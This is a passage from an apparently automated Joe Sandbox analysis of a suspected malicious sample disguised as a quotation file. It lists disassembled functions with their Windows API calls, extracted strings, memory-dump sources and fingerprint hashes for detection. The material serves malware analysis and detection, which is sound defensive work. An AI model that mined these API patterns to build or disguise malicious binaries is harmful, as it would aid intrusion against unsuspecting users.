                                                                      • VariantInit.OLEAUT32(?), ref: 00E788D7
                                                                      • CoInitialize.OLE32(00000000), ref: 00E78904
                                                                      • CoUninitialize.OLE32 ref: 00E7890E
                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00E78A0E
                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E78B3B
                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E92C0C), ref: 00E78B6F
                                                                      • CoGetObject.OLE32(?,00000000,00E92C0C,?), ref: 00E78B92
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00E78BA5
                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E78C25
                                                                      • VariantClear.OLEAUT32(?), ref: 00E78C35
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                      • String ID: ,,
                                                                      • API String ID: 2395222682-1556401989
                                                                      • Opcode ID: 5baa075a0a5322fecc3685b7232f139b2a7942c7b12e363bc148ee35d755a85a
                                                                      • Instruction ID: a499d19b95de1ec91906fa749e4b492901538e40e3c53b5a0c81fcab0f20848e
                                                                      • Opcode Fuzzy Hash: 5baa075a0a5322fecc3685b7232f139b2a7942c7b12e363bc148ee35d755a85a
                                                                      • Instruction Fuzzy Hash: 07C146B1608305AFC704DF64C98892BB7E9FF99348F00992DF989AB251DB31ED05CB52
                                                                      Function 00E577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • _memset.LIBCMT ref: 00E5786B
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E578A0
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E578BC
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E578D8
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E57902
                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E5792A
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E57935
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E5793A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 1411258926-22481851
                                                                      • Opcode ID: c2a0f8a6bc869f2d6b864d6c98dd0c4eeac4d0a4f2a6ba125a7125dee0e4f3a6
                                                                      • Instruction ID: 83bdcac60a83fb40f952cc4fd9a30f7c9356a3b382039fb7e21ff23fd705b47c
                                                                      • Opcode Fuzzy Hash: c2a0f8a6bc869f2d6b864d6c98dd0c4eeac4d0a4f2a6ba125a7125dee0e4f3a6
                                                                      • Instruction Fuzzy Hash: 5D412872C14229AECF11EBA4EC85DEEB7B8FF44305F405429E945B31A1DB30AD58CBA0
                                                                      Function 00E80E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      • Opcode ID: 3e22b886ab536e193636bccb7a9e17e62a2032b150403193ce095986376df7d1
                                                                      • Instruction ID: 2bf584048564c11f029036c8e0266e2571f04824c453371aac11d75ef8276a42
                                                                      • Opcode Fuzzy Hash: 3e22b886ab536e193636bccb7a9e17e62a2032b150403193ce095986376df7d1
                                                                      • Instruction Fuzzy Hash: 6C414F7120025A8BCF60EF10E896AEF37A4BF51354F546464FD6D3B292DB309D5ACB60
                                                                      Function 00E5F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E3E2A0,00000010,?,Bad directive syntax error,00E8F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E5F7C2
                                                                      • LoadStringW.USER32(00000000,?,00E3E2A0,00000010), ref: 00E5F7C9
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • _wprintf.LIBCMT ref: 00E5F7FC
                                                                      • __swprintf.LIBCMT ref: 00E5F81E
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E5F88D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 1506413516-4153970271
                                                                      • Opcode ID: 5051942ad8d748c686e389f0668cf3d0db818da1429f27c5699a0498566f9ffd
                                                                      • Instruction ID: 03f73604bac8ca631709582b9d97e71ccc14fe251a9f61721a97db0712938010
                                                                      • Opcode Fuzzy Hash: 5051942ad8d748c686e389f0668cf3d0db818da1429f27c5699a0498566f9ffd
                                                                      • Instruction Fuzzy Hash: 7A215C3290021ABFCF15EF90CC4AEEE77B9BF18304F041865F555761A2EA31AA58DB51
                                                                      Function 00E652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                        • Part of subcall function 00E07924: _memmove.LIBCMT ref: 00E079AD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E65330
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E65346
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E65357
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E65369
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E6537A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_memmove
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2279737902-1007645807
                                                                      • Opcode ID: c492a138dbe8979254d1a9e03e2e04647fc50bee66202486544bd4f267acc4fa
                                                                      • Instruction ID: 15d0f8b8aa4da109bebf411823846c1067c5eb92a692780fc8baf53dc114b0aa
                                                                      • Opcode Fuzzy Hash: c492a138dbe8979254d1a9e03e2e04647fc50bee66202486544bd4f267acc4fa
                                                                      • Instruction Fuzzy Hash: EC11E231E9022979D720B661DC4ADFFBBBCEBD1F88F40242AB441B21D4EEA01C44C6A0
                                                                      Function 00E646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 208665112-3771769585
                                                                      • Opcode ID: afe6e1b46165df2bff85772506ded12423fe1b14b6b2056b542b71d5eca66473
                                                                      • Instruction ID: fc36cef5c50fa057dafec598445c08f288c5cf8e57cb4e25c066456ef9cf9920
                                                                      • Opcode Fuzzy Hash: afe6e1b46165df2bff85772506ded12423fe1b14b6b2056b542b71d5eca66473
                                                                      • Instruction Fuzzy Hash: 5F11D271500118AFDB24AB70BC4AEEA77BCEB02761F0411BAF54AB60D1EF719AC58B50
                                                                      Function 00E64F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00E64F7A
                                                                        • Part of subcall function 00E2049F: timeGetTime.WINMM(?,7694B400,00E10E7B), ref: 00E204A3
                                                                      • Sleep.KERNEL32(0000000A), ref: 00E64FA6
                                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00E64FCA
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E64FEC
                                                                      • SetActiveWindow.USER32 ref: 00E6500B
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E65019
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E65038
                                                                      • Sleep.KERNEL32(000000FA), ref: 00E65043
                                                                      • IsWindow.USER32 ref: 00E6504F
                                                                      • EndDialog.USER32(00000000), ref: 00E65060
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: 494bd53378bc9ac89b715dedc5a561acca11afc354a8c45330f8395fd98664db
                                                                      • Instruction ID: 54e9b07d24085a006b337a497e5df9310ff21dcc6b3ec5c7c8345c9a79baaa99
                                                                      • Opcode Fuzzy Hash: 494bd53378bc9ac89b715dedc5a561acca11afc354a8c45330f8395fd98664db
                                                                      • Instruction Fuzzy Hash: 04219F71380605AFE7105F32FC88E263BBAEF04789F243434F10AB11B1DB628D599B61
                                                                      Function 00E6D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • CoInitialize.OLE32(00000000), ref: 00E6D5EA
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E6D67D
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00E6D691
                                                                      • CoCreateInstance.OLE32(00E92D7C,00000000,00000001,00EB8C1C,?), ref: 00E6D6DD
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E6D74C
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00E6D7A4
                                                                      • _memset.LIBCMT ref: 00E6D7E1
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00E6D81D
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E6D840
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00E6D847
                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E6D87E
                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00E6D880
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                      • String ID:
                                                                      • API String ID: 1246142700-0
                                                                      • Opcode ID: b4c32760586394f6a31868ba44c10e30fee54376d5fc4862302f22bb0d761e20
                                                                      • Instruction ID: 99ec9da7c3f4f04a260330732281758af17cae51c8ae5c7bf4d0fc7475413d2f
                                                                      • Opcode Fuzzy Hash: b4c32760586394f6a31868ba44c10e30fee54376d5fc4862302f22bb0d761e20
                                                                      • Instruction Fuzzy Hash: E4B1FA75A00109AFDB04DFA4DC88DAEBBF9FF48314B1494A9E909EB261DB30ED45CB50
                                                                      Function 00E5C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00E5C283
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E5C295
                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E5C2F3
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00E5C2FE
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E5C310
                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E5C364
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E5C372
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E5C383
                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E5C3C6
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00E5C3D4
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E5C3F1
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E5C3FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
                                                                      • Instruction ID: abd8c250e595ef0103abace67ada889e08d6e1be89cd1f33f7740804e736f2c2
                                                                      • Opcode Fuzzy Hash: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
                                                                      • Instruction Fuzzy Hash: 61518471B00305AFDB08CFA9DD99A6DBBB5EF88311F24852DF919E7290D7709D448B50
                                                                      Function 00E0201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02036,?,00000000,?,?,?,?,00E016CB,00000000,?), ref: 00E01B9A
                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E020D3
                                                                      • KillTimer.USER32(-00000001,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E0216E
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00E3BCA6
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BCD7
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BCEE
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BD0A
                                                                      • DeleteObject.GDI32(00000000), ref: 00E3BD1C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: e8be131b588f9ab8422d220ca53a57cfad7e1cf39fecff62815900fa5fe4ca9c
                                                                      • Instruction ID: 3fd61a0dfc964df5d069ff30dc995fd3d6758c4775dee871169619a84e9126fa
                                                                      • Opcode Fuzzy Hash: e8be131b588f9ab8422d220ca53a57cfad7e1cf39fecff62815900fa5fe4ca9c
                                                                      • Instruction Fuzzy Hash: F8616A32101B00DFDB299F15C94CB26BBF1FB4031AF50652DE646BA9A0C772A8D6DB90
                                                                      Function 00E021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                                                                      • GetSysColor.USER32(0000000F), ref: 00E021D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: e314c40249a19f861c89d71a02e61d98ef19a267e455a3278e661734371a07d8
                                                                      • Instruction ID: 2e1a6fd118e24f69a4cd38038107775d752c571a3cbd8daa456b4dd0bbba22c3
                                                                      • Opcode Fuzzy Hash: e314c40249a19f861c89d71a02e61d98ef19a267e455a3278e661734371a07d8
                                                                      • Instruction Fuzzy Hash: A441B031000140AFDB255FA9EC8CBB93BA5EB56325F145269FF65AA1F2C7318CC6DB21
                                                                      Function 00E6A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,00E8F910), ref: 00E6A90B
                                                                      • GetDriveTypeW.KERNEL32(00000061,00EB89A0,00000061), ref: 00E6A9D5
                                                                      • _wcscpy.LIBCMT ref: 00E6A9FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2820617543-1000479233
                                                                      • Opcode ID: 718b028a524a9e250e9bf7d6e65e098d26a927f901cd439aa5ce0182e34c05f0
                                                                      • Instruction ID: e9b2c1b5f8fa08a3a4e374f4363d08845234b5c5343d11044593b73b12dd4957
                                                                      • Opcode Fuzzy Hash: 718b028a524a9e250e9bf7d6e65e098d26a927f901cd439aa5ce0182e34c05f0
                                                                      • Instruction Fuzzy Hash: 3A519A315483009BC710EF14E992AAFB7E5AFC4384F586829F49A772E2DB319949CB52
                                                                      Function 00E09837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __i64tow__itow__swprintf
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 421087845-2263619337
                                                                      • Opcode ID: c52f22ee335cf845aef7120a40d64f99088a6934138ee09169303deb68ba3981
                                                                      • Instruction ID: 90cdddea63ff453148f4ff84b449dceb08940bd0b9da272059d8d205b3983b5a
                                                                      • Opcode Fuzzy Hash: c52f22ee335cf845aef7120a40d64f99088a6934138ee09169303deb68ba3981
                                                                      • Instruction Fuzzy Hash: 4341A471904205AFDB28DF74E846AB677E8EF45304F20646EE54AF6293EA359D41CB20
                                                                      Function 00E87152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E8716A
                                                                      • CreateMenu.USER32 ref: 00E87185
                                                                      • SetMenu.USER32(?,00000000), ref: 00E87194
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87221
                                                                      • IsMenu.USER32(?), ref: 00E87237
